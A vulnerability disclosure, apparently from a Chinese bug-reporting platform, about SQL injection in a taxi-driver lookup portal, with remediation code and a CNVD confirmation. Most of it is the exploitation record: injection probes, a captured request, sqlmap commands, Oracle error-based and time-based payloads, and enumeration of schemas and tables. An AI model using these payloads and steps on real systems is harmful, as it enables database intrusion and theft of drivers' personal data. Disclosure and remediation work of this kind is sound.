2015-10-16: Details sent to the vendor, awaiting vendor processing
2015-10-20: Vendor has confirmed; details disclosed to the vendor only
2015-10-30: Details disclosed to core white hats and relevant domain experts
2015-11-09: Details disclosed to regular white hats
2015-11-19: Details disclosed to intern white hats
2015-12-04: Details disclosed to the public
Mom no longer needs to worry about me not getting a taxi.
Problem URL: http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905 . In the name lookup, entering ' produces an error.
Entering ' and '1'=1 displays normally.
Capturing a request with normal parameters in Burp Suite gives the following content:
POST /WebPortal/DriverInfo.aspx?cid=F973F6861D000905 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 2132
Pragma: no-cache
Cookie: ASP.NET_SessionId=tfbe5un5qvbejnfbrj0i2355; BIGipServerpool_czcweb=4184123584.17695.0000

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTgyNDM4OTMwNA9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTmV3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC9QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS%2FoeaBr%2BWFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3J0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL%2FnrZbotYTorq9kAgMPZBYCZg8VAxcvV2ViUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS%2FoeaBr2QCBA9kFgJmDxUDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnaNkAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjAzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGlzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS%2F5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVGV4dAUM5LyB5Lia5L%2Bh5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg%2FbWlkPUU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ%2Fpqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecml2ZXJJbmZvLmFzcHg%2FY2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm9ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db21wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGFsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui%2BhuS%2FoeaBr2QCAg9kFgJmDxUDGi9XZWJQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am%2B6am25ZGY5L%2Bh5oGvZAIDD2QWAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgUPDxYCHwEFD%2BmpvumptuWRmOS%2FoeaBr2RkAgsPFgIfAAL%2F%2F%2F%2F%2FD2QCDQ8PFgQeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1VDSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g%3D%3D&__VIEWSTATEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLDp3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALIDATION=%2FwEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY%2FGAwL6iuvMDAK4kLvqAgLRqb%2BCAQKPnrNoO%2F6cSo%2BN7RscJYLcgsS6WewNzT4%3D&UCHeader1%24keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123&ibtnSearch.x=25&ibtnSearch.y=13
Run it through sqlmap: the database user is DB, and it has DBA privileges.
C:\Python27\sqlmap1.0\sqlmap>sqlmap.py -r d:\5.txt --current-user --is-dba

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150915}
|_ -| . |   | | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:54:07

[23:54:07] [INFO] parsing HTTP request from 'd:\5.txt'
[23:54:07] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:54:07] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:54:07] [INFO] resuming back-end DBMS 'oracle'
[23:54:07] [INFO] testing connection to the target URL
[23:54:07] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[23:54:08] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtDriverName (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNA9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTmV3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC9QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3J0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2ViUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDxUDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnaNkAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjAzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGlzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVGV4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPUU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecml2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm9ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db21wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGFsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZWJQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2QWAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgUPDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1VDSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTATEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLDp3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALIDATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6cSo+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123' AND 9063=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (9063=9063) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'RaDy'='RaDy&ibtnSearch.x=25&ibtnSearch.y=13

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNA9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTmV3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC9QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3J0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2ViUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDxUDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnaNkAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjAzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGlzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVGV4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPUU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecml2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm9ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db21wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGFsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZWJQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2QWAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgUPDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1VDSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTATEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLDp3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALIDATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6cSo+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=-6174' OR 1375=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(118)||CHR(100)||CHR(115),5) AND 'vvDv'='vvDv&ibtnSearch.x=25&ibtnSearch.y=13
---
[23:54:08] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[23:54:08] [INFO] fetching current user
[23:54:08] [INFO] resumed: DB
current user: 'DB'
[23:54:08] [INFO] testing if current user is DBA
current user is DBA: True
Now list the databases on the server:
[23:56:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[23:56:03] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[23:56:03] [INFO] fetching database (schema) names
[23:56:03] [INFO] the SQL query used returns 12 entries
[23:56:03] [INFO] resumed: CYZGDB
[23:56:03] [INFO] resumed: DB
[23:56:03] [INFO] resumed: DBSNMP
[23:56:03] [INFO] resumed: EXFSYS
[23:56:03] [INFO] resumed: OUTLN
[23:56:03] [INFO] resumed: SYS
[23:56:03] [INFO] resumed: SYSMAN
[23:56:03] [INFO] resumed: SYSTEM
[23:56:03] [INFO] resumed: TESTDB
[23:56:03] [INFO] resumed: TPMANAGER
[23:56:03] [INFO] resumed: TSMSYS
[23:56:03] [INFO] resumed: WMSYS
available databases [12]:
[*] CYZGDB
[*] DB
[*] DBSNMP
[*] EXFSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TESTDB
[*] TPMANAGER
[*] TSMSYS
[*] WMSYS
Next, enumerate the tables in the CYZGDB database. There are many tables, so only part of the output is shown:
Database: CYZGDB
[64 tables]
+--------------------------+
| BASEDEPARTMENT           |
| BASEEXCEPTION            |
| BASEITEMDETAILS          |
| BASEITEMS                |
| BASELOG                  |
| BASEMODULE               |
| BASEOBJECTPERMISSION     |
| BASEPARAM                |
| BASEPERMISSION           |
| BASEROLE                 |
| BASESEQ                  |
| BASEUSER                 |
| BASEUSERPARAM            |
| BASEUSERPROJECT          |
| BASEUSERROLE             |
| CLIENT_TAXT_NOTICE       |
| TABLE_YEAR_SEQID         |
| TAXI_APPLYEXAM           |
| TAXI_CANCELSTATIS        |
| TAXI_CONCOMPANY          |
| TAXI_CONPLANCHECK        |
| TAXI_CONTEACHERS         |
| TAXI_CONTINUESTUDY       |
| TAXI_CONTINUESTUDY2      |
| TAXI_COSTFEE             |
| TAXI_COURSEID            |
| TAXI_DRIVER              |
| TAXI_EXAMFEE             |
| TAXI_EXAMPLAN            |
| TAXI_EXCHAGEEAXM         |
| TAXI_EXCHAGETERM         |
| TAXI_FAILSCORESTUDENT    |
| TAXI_IPRECORD            |
| TAXI_LINK                |
| TAXI_LOGOUTSTUDENT       |
| TAXI_NOTREAINREG         |
| TAXI_OUTLINE             |
| TAXI_PHOTO               |
| TAXI_PLANT               |
| TAXI_QUALITYAPPLY        |
| TAXI_QUALITYREG          |
| TAXI_REGISTRATION        |
| TAXI_STUDENTLEARNLIST    |
| TAXI_STUDENT_DATE        |
| TAXI_STUDYCONDITION      |
| TAXI_STUNDENTINFO_IMPORT |
| TAXI_STUNDENTPRINTLOG    |
| TAXI_TEACHERINFO         |
| TAXI_TRAINREQUEST        |
| TAXT_REGQUALITYDATA      |
| TAXT_STUNDENTDATA        |
| TEMPAPPLYEXAMNOTRAIN     |
| TEMPAPPLYEXAMSTULEARN    |
| TEMPAPPLYMAKEUPINFO      |
| TEMPAUDITINGAPPLYEXAM    |
| TEMPAUDITINGEXAMNOTRAIN  |
| TEMPAUDITINGEXAMSTULEARN |
| TEMPEXAMPLAN             |
| TEMPMAKEUPINFO           |
| TEMPNOTRAINSTUINFO       |
| TEMPQUALITYAPPLY         |
| TEMPREGISTINFO           |
| TEMPSTULEARNINFO         |
| TEMPTRAINPLANINFO        |
+--------------------------+
Query the contents of the TAXI_DRIVER table:
The volume of data is large, so only part of it was captured; the other tables were not examined, and they also hold a lot of content!
Proven!
Filter the parameters!
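The behaviour reported above (a bare ' in the name lookup raises an error, while ' and '1'=1 renders normally) is the signature of user input being spliced into the SQL text, and "filter the parameters" is only part of the remedy: the value has to reach Oracle as a bind variable. The C# below is an added example, not code from the report or from the affected site; it shows the concatenating pattern beside a parameterised ODP.NET version with an input allow-list as defence in depth. The connection string, the DRIVER_NAME column, the 64-character limit and the method names are assumptions (the report only names the TAXI_DRIVER table and the txtDriverName field).

```csharp
using System;
using System.Data;
using System.Text.RegularExpressions;
using Oracle.ManagedDataAccess.Client; // assumption: ODP.NET managed driver is referenced

public static class DriverLookup
{
    // Assumed column name; the report only shows the table TAXI_DRIVER.
    private const string VulnerableSqlTemplate =
        "SELECT * FROM TAXI_DRIVER WHERE DRIVER_NAME = '{0}'";

    // The pattern behind the report: the form value becomes part of the SQL
    // text, so a single quote in txtDriverName alters the statement itself.
    // Kept here only to show what the hardened method replaces.
    public static string BuildVulnerableSql(string driverName)
    {
        return string.Format(VulnerableSqlTemplate, driverName);
    }

    // Hardened form: the value travels as a bind variable (:name) and is
    // never interpreted as SQL, whatever characters it contains.
    public static DataTable FindDriver(string connectionString, string driverName)
    {
        if (!IsPlausibleName(driverName))
            throw new ArgumentException("driver name rejected by the input allow-list");

        using (var conn = new OracleConnection(connectionString))
        using (var cmd = conn.CreateCommand())
        {
            cmd.CommandText = "SELECT * FROM TAXI_DRIVER WHERE DRIVER_NAME = :name";
            cmd.BindByName = true;
            cmd.Parameters.Add(new OracleParameter("name", OracleDbType.Varchar2, 64)
            {
                Value = driverName
            });

            var table = new DataTable();
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }

    // Defence in depth: a name field has no legitimate need for quotes,
    // comment markers or SQL operators. Letters (including CJK), digits,
    // spaces and a little name punctuation, bounded to 64 characters
    // (the length is an assumption, matched to the bind size above).
    private static readonly Regex NamePattern =
        new Regex(@"^[\p{L}\p{N}\s.\-·]{1,64}$", RegexOptions.Compiled);

    public static bool IsPlausibleName(string driverName)
    {
        return !string.IsNullOrEmpty(driverName) && NamePattern.IsMatch(driverName);
    }
}
```

With the bind variable in place, both probes from the report (' on its own and ' and '1'=1) are handed to Oracle as literal name strings that simply match no row, and the error-based and time-based payloads sqlmap found lose their effect for the same reason. The allow-list is a secondary control that rejects such input before a connection is even opened, but it is not a substitute for the bind variable: a field that legitimately accepts quotes could not use it, and the parameterised query is what actually closes the hole. The page runs as a DBA account, so a least-privilege database user for the web application is the other change worth making alongside this one.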
Severity: Medium
Vulnerability Rank: 9
Confirmed at: 2015-10-20 16:34
CNVD has confirmed and reproduced the described vulnerability; it has been forwarded by CNCERT to the Shaanxi branch center, which will coordinate remediation with the organization that manages the website.
None